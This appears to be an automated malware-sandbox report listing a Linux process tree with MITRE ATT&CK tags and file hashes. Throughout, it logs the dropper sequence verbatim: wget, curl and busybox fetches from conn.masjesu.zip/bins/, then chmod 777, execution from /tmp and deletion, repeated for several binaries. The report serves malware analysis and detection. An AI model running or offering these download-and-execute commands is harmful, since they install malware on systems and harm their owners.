PID:944
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- System Network Configuration Discovery
PID:947
-
-
/bin/chmodchmod 777 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh./97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵PID:950
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵PID:951
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- System Network Configuration Discovery
PID:954
-
-
/bin/chmodchmod 777 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY./4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- System Network Configuration Discovery
PID:961
-
-
/bin/chmodchmod 777 OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD./OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- System Network Configuration Discovery
PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- System Network Configuration Discovery
PID:968
-
-
/bin/chmodchmod 777 nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3./nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:970
-
-
/bin/rmrm nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- System Network Configuration Discovery
PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵PID:975
-
-
/bin/chmodchmod 777 ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc./ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- System Network Configuration Discovery
PID:982
-
-
/bin/chmodchmod 777 yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO./yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵PID:989
-
-
/bin/chmodchmod 777 AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05./AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵PID:996
-
-
/bin/chmodchmod 777 ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I./ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u./LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- System Network Configuration Discovery
PID:1007
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵PID:1010
-
-
/bin/chmodchmod 777 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw./9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵PID:1013
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97